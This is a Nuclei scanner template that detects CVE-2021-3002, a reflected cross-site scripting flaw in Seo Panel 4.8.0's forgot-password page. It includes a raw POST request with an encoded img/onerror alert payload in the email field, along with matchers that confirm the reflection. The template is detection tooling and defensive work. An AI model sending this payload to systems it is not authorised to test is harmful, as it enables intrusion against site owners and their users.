nuclei-templates/http/cves/2021/CVE-2021-3002.yaml

56 lines
1.9 KiB
YAML

id: CVE-2021-3002
info:
name: Seo Panel 4.8.0 - Cross-Site Scripting
author: edoardottt
severity: medium
description: Seo Panel 4.8.0 contains a reflected cross-site scripting vulnerability via the seo/seopanel/login.php?sec=forgot email parameter.
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
remediation: |
Upgrade to a patched version of Seo Panel or apply the necessary security patches provided by the vendor.
reference:
- http://www.cinquino.eu/SeoPanelReflect.htm
- https://github.com/seopanel/Seo-Panel/issues/202
- https://nvd.nist.gov/vuln/detail/CVE-2021-3002
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-3002
cwe-id: CWE-79
epss-score: 0.00143
epss-percentile: 0.4998
cpe: cpe:2.3:a:seopanel:seo_panel:4.8.0:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: "seopanel"
product: seo_panel
tags: cve,cve2021,seopanel,xss
http:
- raw:
- |
POST /seo/seopanel/login.php?sec=forgot HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
sec=requestpass&email=test%40test.com%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3e11&code=AAAAA&login=
matchers-condition: and
matchers:
- type: word
part: header
words:
- "text/html"
- type: word
part: body
words:
- "<img src=a onerror=alert(document.domain)>"
- "seopanel"
condition: and
- type: status
status:
- 200
# digest: 490a0046304402202e3af190b1ea5167d641b3ae6a5519828e3ef09b8f2848f910742183e296129702204348b9dc2d73ae179f08bf6754f4d29ea399b7e1dbeec4f688e84c659c2b4edf:922c64590222798bb761d5b6d8e72950